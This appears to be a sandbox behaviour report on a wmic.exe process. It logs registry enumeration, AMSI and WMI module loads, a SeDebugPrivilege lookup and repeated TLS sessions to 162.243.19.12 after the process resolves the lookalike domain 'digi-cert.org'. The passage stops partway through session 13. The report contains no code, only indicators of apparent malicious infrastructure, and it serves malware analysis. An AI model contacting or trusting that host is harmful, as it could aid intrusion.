Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Open c:\windows\system32\wbem\wmic.exe desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmic.exe desired_access = SYNCHRONIZE True 1
Fn
Module (64)
»
Operation Module Additional Information Success Count Logfile
Load amsi.dll base_address = 0x7ffbf68c0000 True 1
Fn
Load C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\wminet_utils.dll base_address = 0x7ffbf68f0000 True 1
Fn
Get Handle c:\windows\system32\wbem\wmic.exe base_address = 0x7ff66e670000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 1
Fn
Get Handle c:\windows\system32\kernelbase.dll base_address = 0x7ffc14550000 True 1
Fn
Get Filename - process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260 True 3
Fn
Get Address c:\windows\system32\kernel32.dll function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0 True 1
Fn
Get Address c:\windows\system32\amsi.dll function = AmsiInitialize, address_out = 0x7ffbf68c2260 True 1
Fn
Get Address c:\windows\system32\amsi.dll function = AmsiScanString, address_out = 0x7ffbf68c26b0 True 1
Fn
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670 True 1
Fn
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540 True 1
Fn
Get Address Unknown module name function = ResetSecurity, address_out = 0x7ffbf68f20e0 True 1
Fn
Get Address Unknown module name function = SetSecurity, address_out = 0x7ffbf68f21b0 True 1
Fn
Get Address Unknown module name function = BlessIWbemServices, address_out = 0x7ffbf68f2290 True 1
Fn
Get Address Unknown module name function = BlessIWbemServicesObject, address_out = 0x7ffbf68f23b0 True 1
Fn
Get Address Unknown module name function = GetPropertyHandle, address_out = 0x7ffbf68f24d0 True 1
Fn
Get Address Unknown module name function = WritePropertyValue, address_out = 0x7ffbf68f2500 True 1
Fn
Get Address Unknown module name function = Clone, address_out = 0x7ffbf68f2530 True 2
Fn
Get Address Unknown module name function = VerifyClientKey, address_out = 0x7ffbf68f31f0 True 1
Fn
Get Address Unknown module name function = GetQualifierSet, address_out = 0x7ffbf68f2a50 True 1
Fn
Get Address Unknown module name function = Get, address_out = 0x7ffbf68f2700 True 1
Fn
Get Address Unknown module name function = Put, address_out = 0x7ffbf68f26c0 True 1
Fn
Get Address Unknown module name function = Delete, address_out = 0x7ffbf68f2750 True 1
Fn
Get Address Unknown module name function = GetNames, address_out = 0x7ffbf68f2760 True 1
Fn
Get Address Unknown module name function = BeginEnumeration, address_out = 0x7ffbf68f27b0 True 1
Fn
Get Address Unknown module name function = Next, address_out = 0x7ffbf68f27c0 True 1
Fn
Get Address Unknown module name function = EndEnumeration, address_out = 0x7ffbf68f2810 True 1
Fn
Get Address Unknown module name function = GetPropertyQualifierSet, address_out = 0x7ffbf68f2820 True 1
Fn
Get Address Unknown module name function = GetObjectText, address_out = 0x7ffbf68f2840 True 1
Fn
Get Address Unknown module name function = SpawnDerivedClass, address_out = 0x7ffbf68f2860 True 1
Fn
Get Address Unknown module name function = SpawnInstance, address_out = 0x7ffbf68f2880 True 1
Fn
Get Address Unknown module name function = CompareTo, address_out = 0x7ffbf68f28a0 True 1
Fn
Get Address Unknown module name function = GetPropertyOrigin, address_out = 0x7ffbf68f28c0 True 1
Fn
Get Address Unknown module name function = InheritsFrom, address_out = 0x7ffbf68f28e0 True 1
Fn
Get Address Unknown module name function = GetMethod, address_out = 0x7ffbf68f28f0 True 1
Fn
Get Address Unknown module name function = PutMethod, address_out = 0x7ffbf68f2940 True 1
Fn
Get Address Unknown module name function = DeleteMethod, address_out = 0x7ffbf68f2990 True 1
Fn
Get Address Unknown module name function = BeginMethodEnumeration, address_out = 0x7ffbf68f29a0 True 1
Fn
Get Address Unknown module name function = NextMethod, address_out = 0x7ffbf68f29b0 True 1
Fn
Get Address Unknown module name function = EndMethodEnumeration, address_out = 0x7ffbf68f2a00 True 1
Fn
Get Address Unknown module name function = GetMethodQualifierSet, address_out = 0x7ffbf68f2a10 True 1
Fn
Get Address Unknown module name function = GetMethodOrigin, address_out = 0x7ffbf68f2a30 True 1
Fn
Get Address Unknown module name function = QualifierSet_Get, address_out = 0x7ffbf68f2a60 True 1
Fn
Get Address Unknown module name function = QualifierSet_Put, address_out = 0x7ffbf68f2ab0 True 1
Fn
Get Address Unknown module name function = QualifierSet_Delete, address_out = 0x7ffbf68f2ae0 True 1
Fn
Get Address Unknown module name function = QualifierSet_GetNames, address_out = 0x7ffbf68f2af0 True 1
Fn
Get Address Unknown module name function = QualifierSet_BeginEnumeration, address_out = 0x7ffbf68f2b10 True 1
Fn
Get Address Unknown module name function = QualifierSet_Next, address_out = 0x7ffbf68f2b20 True 1
Fn
Get Address Unknown module name function = QualifierSet_EndEnumeration, address_out = 0x7ffbf68f2b70 True 1
Fn
Get Address Unknown module name function = GetCurrentApartmentType, address_out = 0x7ffbf68f2a50 True 1
Fn
Get Address Unknown module name function = GetDemultiplexedStub, address_out = 0x7ffbf68f2060 True 1
Fn
Get Address Unknown module name function = CreateInstanceEnumWmi, address_out = 0x7ffbf68f1760 True 1
Fn
Get Address Unknown module name function = CreateClassEnumWmi, address_out = 0x7ffbf68f18c0 True 1
Fn
Get Address Unknown module name function = ExecQueryWmi, address_out = 0x7ffbf68f1a20 True 1
Fn
Get Address Unknown module name function = ExecNotificationQueryWmi, address_out = 0x7ffbf68f1b90 True 1
Fn
Get Address Unknown module name function = PutInstanceWmi, address_out = 0x7ffbf68f1d00 True 1
Fn
Get Address Unknown module name function = PutClassWmi, address_out = 0x7ffbf68f1e00 True 1
Fn
Get Address Unknown module name function = CloneEnumWbemClassObject, address_out = 0x7ffbf68f1f00 True 1
Fn
Get Address Unknown module name function = ConnectServerWmi, address_out = 0x7ffbf68f34c0 True 1
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 False 1
Fn
Map Global\netfxcustomperfcounters.1.0.net clr networking process_name = c:\windows\system32\wbem\wmic.exe, desired_access = FILE_MAP_WRITE True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (48)
»
Operation Additional Information Success Count Logfile
Open Certificate Store encoding_type = 65537, flags = 8708 True 17
Fn
Open Certificate Store encoding_type = 65537, flags = 8708 True 15
Fn
Get Computer Name result_out = X2VS1CUM True 3
Fn
Get Time type = Local Time, time = 2018-06-26 23:00:06 (Local Time) True 1
Fn
Get Time type = Ticks, time = 190843 True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 7
Fn
Get Info type = Hardware Information True 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Mutex (20)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Release mutex_name = Global\.net clr networking True 10
Fn
Environment (105)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Get Environment String name = MshEnableTrace False 100
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\Nd9E1FYi True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules True 1
Fn
Network Behavior
DNS (5)
»
Operation Additional Information Success Count Logfile
Resolve Name host = digi-cert.org, address_out = 162.243.19.12 True 5
Fn
TCP Sessions (16)
»
Information Value
Total Data Sent 5.75 KB
Total Data Received 28.70 KB
Contacted Host Count 1
Contacted Hosts 162.243.19.12:443
TCP Session #1
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #3
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #4
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #5
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 680 bytes
Data Received 3.68 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 61, size_out = 61 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1575, size_out = 1575 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 331, size_out = 331 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4, size_out = 4 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 134, size_out = 134 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 218, size_out = 218 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 213, size_out = 213 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #6
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #7
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.60 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 272, size_out = 272 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1248, size_out = 1248 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #8
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 546 bytes
Data Received 3.03 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 213, size_out = 213 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #9
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #10
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #11
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #12
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #13
»
Information Value
Handle 0x7d0
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49714
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1
Fn
Data
Send flags = NO_FLAG_SET, size_out = 272 True 1
Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1
Fn
